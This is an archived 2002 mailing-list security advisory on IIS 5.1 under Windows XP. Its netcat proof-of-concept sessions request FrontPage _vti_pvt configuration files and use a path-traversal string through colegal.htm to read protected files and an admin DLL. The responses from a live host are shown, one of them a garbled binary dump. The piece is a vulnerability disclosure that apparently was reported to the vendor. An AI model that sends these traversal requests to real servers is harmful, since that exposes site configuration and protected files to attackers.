This is the CORRECTED POST please ignore the one befor same subject MULTIPLE Remote Issues with II5.1 on Windows XP

From: Adonis.No.Spam (adonis1at_private)
Date: Sun Feb 10 2002 - 18:29:36 PST

  • Next message: Florian Weimer: "RUS-CERT Advisory 2002-02:01: Temporary file handling in GNAT" 

    -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                             .---------------.
                            / NtWaK0 Advisory \
+---------------------------------------------------------------------------
.

:
Affected         : Windows XP with IIS 5.1
:
Type             : MULTIPLE Remote Issues
:
Type             : Remote/ Local Security Issues
:
Date             : 10-02-2002
:
Author           : NtWaK0 @ www.SafeHack.com
:
Credit           : NtWaK0 @ www.SafeHack.com
:
+---------------------------------------------------------------------------
.

+--------------------.
 Remote/Local Expoit  \
+----------------------`----------------------------------------------------
.

:
+-----------.                                  * * * www.SafeHack.com * * *
:
 Disclaimer  \
:
+-------------`-------------------------------------------------------------
.

:
This material is presented for informational and entertainment purposes
:
only, and to satisfy the curious. Any activities described in this file
:
which involve vandalism, theft, or any other illegal activities are
:
recounted from third-party conversations. I do not condone or encourage
:
vandalism or theft. I do not accept any liability for anything anyone
:
does with this information. So, don't shoot the messenger.
:
Remember: Use a computer in ways that ensure respect for your fellows.
:

:
+-------.
:
 T.O.C.  \
:
+---------`-----------------------------------------------------------------
.

:

:
   [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 40 ]
:

:
   [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 60 ]
:

:
   [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 156 ]
:

:
+-------------.
:
 Brief History \
:
+---------------`-----------------------------------------------------------
.
I had the chance to play for couple of hours with IIS 5.1 on a friend Box,
:
thanks to Recon. While I was trying some stuff on IIS 5.1 I MANY problems
:
with default IIS 5.1 installation and on files installed by default.
:

:
This one is not the same as the one reported earlier. The one reported
:
before had to deal with "GET /_vti_bin/shtml.dll".
:
A copy of it can be found at :
:
http://www.safehack.com/Advisory/shtmldump.txt
:

:
+-------+
:
 Test OS
:
+-------+
:
Tested on Windows XP with IIS 5.1
:

:

:
Please continue to read for more details.
:

:
+-----------.
:
 The Problem \
:
+-------------`-------------------------------------------------------------
.

:
>>> 1- Issue <<<
:

:
Identify WEB DIR installation. By sending this "GET /_vti_pvt/access.cnf"
:
you can identify the web installation. As we all know this is a helpfull
:
peace of information if someone is going to attack your web site.
:

:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/access.cnf
:
vti_encoding:SR|utf8-nl
:
RealmName:LAMER
:
InheritPermissions:false
:
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
:

:
Their is another security issue with this too. "InheritPermissions:false"
:
This will tell security inheritance of that folder.
:

:
>>> 2- Issue <<<
:
>>> Proof-Of-Concept <<<
:

:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/botinfs.cnf
:

:
vti_encoding:SR|utf8-nl
:
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\
:
40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar
:

:
>>> 3- Issue <<<
:

:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/bots.cnf
:
vti_encoding:SR|utf8-nl
:
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared
:
\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
:
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft
:
\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar
:
\\\\fp4Avnb.dll
:

:
>>> 4- Issue <<<
:
Using GET /iishelp/common/colegal.htm you can access other files. under the
:
web structure. I did not have chance to test it on file above the
:
web structure. Like I said I do not run IIS 5.1 but a friend does.
:
One of these days I am  going to buy more memory for some of my old box and
:
 slap on it IIS 5.1 to be able to do better test.
:

:
>>> Proof-Of-Concept <<<
:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf
:
vti_encoding:SR|utf8-nl
:
RealmName:LAMER
:
InheritPermissions:false
:
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
:

:
writeto.cnf [Extracted From]
:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/
:
prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp
:

:
Back links for files that can be written to by users of the web, such as
:
Save Results Form handler result files. Files that can be written to by
:
users of the web have a looser security setting than regular web content.
:

:

:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll
:
MZÉ ?   ? + @a   ??¦? ¦  -!+?L-!This program cannot be run in DOS mode.
:
$ §-Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦?ï
:
PE  L??         _; a ?!???  ?   0      c?   ?        µg ?   ?  ?       ?
:
        P   ?  ¿-  ?     ?  ?    ?  ?      ?    ?  »   (?  P    0  P?
:

:

:

:
C:\Tool>nc -v -n 67.82.156.211 81
:
(UNKNOWN) [67.82.156.211] 81 (?) open
:
GET /_vti_pvt/linkinfo.cnf
:
vti_encoding:SR|utf8-nl
:
javascript\:loadhelpfront();:localstart.asp
:
javascript\:activate(<%=iver%>);:localstart.asp
:
http\://www.safehack.com:index.htm
:
/iishelp/common/colegal.htm:localstart.asp
:

:

:

:
NOTE: A search on google for "writeto.cnf" Returned alarmed results
:
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=
:

:

:
+------------.
:
 The Solution \
:
+--------------`------------------------------------------------------------
.
No idea. Vendor was informed.
:
If you are going to use the founded issues, credit must be given to the
:
author. NtWaK0 @ www.safehack.com
:
+---------------------------------------------------------------------------
.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
w0aAHeJqCi7MoCs62m5AR8dm
=u7kB
-----END PGP SIGNATURE-----

________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
RFCs are meant to be read and followed…:)                  /`\  NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-

    This archive was generated by hypermail 2b30 : Mon Feb 11 2002 - 15:06:50 PST